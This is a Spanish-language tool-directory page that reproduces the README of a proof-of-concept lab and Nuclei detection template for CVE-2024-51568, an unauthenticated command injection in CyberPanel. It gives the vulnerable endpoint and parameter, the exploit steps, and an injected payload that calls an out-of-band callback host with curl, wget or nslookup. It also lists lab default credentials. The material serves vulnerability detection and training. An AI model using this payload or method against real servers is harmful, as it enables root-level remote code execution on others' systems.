Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónLabs y Práctica
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Entorno de prueba de concepto y plantilla de Nuclei para probar CVE-2024-51568, una vulnerabilidad de inyección de comandos previa a la autenticación en CyberPanel, que permite la ejecución remota de código con privilegios de root.

Ver Repositorio
113hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-51568 - PoC de Inyección de Comandos en CyberPanel

Un entorno de prueba de concepto y plantilla Nuclei para probar CVE-2024-51568, una vulnerabilidad crítica de inyección de comandos sin autenticación en CyberPanel.

Detalles de la Vulnerabilidad

  • CVE: CVE-2024-51568
  • Severidad: Crítica (CVSS 9.8)
  • Tipo: Inyección de Comandos sin Autenticación
  • Endpoint: /filemanager/upload
  • Parámetro: completePath
  • Impacto: Ejecución Remota de Código con privilegios de root

Inicio Rápido

1. Iniciar Entorno Vulnerable

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Verificar que CyberPanel esté funcionando

root@kitploit:~
curl -I http://localhost:8090

3. Probar la Vulnerabilidad

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Salida de Ejemplo:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

Cómo Funciona

La Vulnerabilidad

CyberPanel v2.3.4 contiene una falla de inyección de comandos en la funcionalidad de carga de archivos:

  1. Endpoint: POST /filemanager/upload
  2. Parámetro: completePath en datos de formulario multipart
  3. Inyección: Los comandos se ejecutan a través de ProcessUtilities.outputExecutioner()
  4. Bypass: No se requiere autenticación debido a un bypass del middleware

Plantilla de Nuclei:

  1. Extrae el token CSRF de la solicitud GET inicial
  2. Envía una carga de archivo maliciosa con el comando inyectado en completePath
  3. Utiliza Interactsh para detección fuera de banda (devoluciones de llamada HTTP/DNS)
  4. Detecta la ejecución exitosa cuando el servidor contacta la URL de Interactsh

Payload de Detección

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Este payload garantiza una detección confiable en diferentes configuraciones del sistema.

Configuración

Acceso a CyberPanel

  • URL: http://localhost:8090
  • Administrador: admin
  • Contraseña: 1234567

Referencias

  • Investigación Original
  • Módulo de Metasploit
  • Detalles de CVE

Aviso de Seguridad

Este entorno contiene vulnerabilidades intencionales para investigación y educación en seguridad:

  • NO implementar en producción
  • NO exponer a redes públicas
  • NO usar en sistemas que no sean de tu propiedad
  • USAR solo para pruebas de seguridad autorizadas

Descargo de Responsabilidad

Esta prueba de concepto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Los usuarios son responsables de cumplir con las leyes aplicables y de obtener la autorización adecuada antes de realizar las pruebas.

Descargar herramienta